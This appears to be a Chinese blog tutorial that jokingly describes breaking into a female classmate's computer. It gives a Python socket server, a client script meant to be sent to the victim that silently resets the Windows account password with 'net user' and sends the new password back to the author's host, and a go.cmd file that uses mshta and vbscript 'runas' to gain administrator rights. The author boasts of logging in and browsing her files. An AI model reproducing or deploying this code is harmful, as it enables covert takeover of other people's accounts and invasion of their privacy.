前言
班花加我说她电话坏了让我看看,那肯定义不容辞!【兴奋了半个小时】没别的我就想秀一下技术!五分钟后我修好了,电脑重启之后显示输入密码,当时没多想直接走了。回去之后我能不能用技术远程解析一下这个开机密码呢,说干就干。
工具准备
开发环境:win10、python3.7
开发工具:pycharm
项目思路解析
一想到远程,就想到创建连接,一想到创建链接,就想到socket套接字(一想到套接字,就联想到我没有女朋)
该项目代码为3份(记住自己拿的是服务端的代码,客服端代码和go.cmd是发给别人的)
首先正常流程创建服务端的服务
服务端流程:
- 创建套接字
-绑定ip和端口
-设置监听
-等待链接
-接受数据打印数据
-关闭链接
import socket # 导入socketserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 创建socketserver.bind(('192.168.246.1', 44444)) # 绑定IP/端口server.listen(5) # 监听print('***********等待连接*********')conn, addr = server.accept() # 连接print(conn)print('客户端的地址:', addr)client_msg = conn.recv(1024)print('客户端修改的密码是: %s' % client_msg)conn.close()server.close()
windows的修改电脑密码的命令:net User 用户名 修改的密码(可以自己动手试一下)
客户端流程:
- 创建套接字
-连接服务端的IP和端口
-获取当前使用的电脑账户名
-生成随机的电脑密码
-在终端执行修改Windows密码的指令
-发送修改之后的密码
-关闭套接字
import socket # 导入用到的模块import getpassimport subprocessimport randomclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 创建socket实例client.connect((ip, 端口)) # 连接server端IP地址/端口按你自己实际情况来user = getpass.getuser() # 获取计算机用户名print(user)psd = ''for j in range(1, 9): # 生成1-9的随机数m = str(random.randrange(0, 10))psd = psd + msubprocess.Popen(['net', 'User', user, psd]) # 在本地执行(类似于cmd命令)client.send(psd.encode('utf-8')) # 将密码发送给server端back_msg = client.recv(1024)client.close() # 关闭socket
到这一步基本就可以自己去尝试了,但是要注意,当前代码只能修改权限是admin的账户。
还在翻呢!!!!!!!!
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
下面会有怎么修改非admin的内容嘛??????
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
非admin用户需要提高自己的执行权限
直接使用超级管理员权限执行cmd文件
go.cmd
@echo off%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exitcd /d "%~dp0"start python client.py
小结
最后我修改密码成功登陆,竟然发现了她的密码!
这铁憨憨C盘满了都不知道清理,一看就是不太懂电脑的亚子!班花那么好看竟然不太懂电脑,真是惊人的发现哩!
PS:最后我啥都没动改回去了! 仅供学习技术交流!切勿违法违纪!本人不承担一切后果!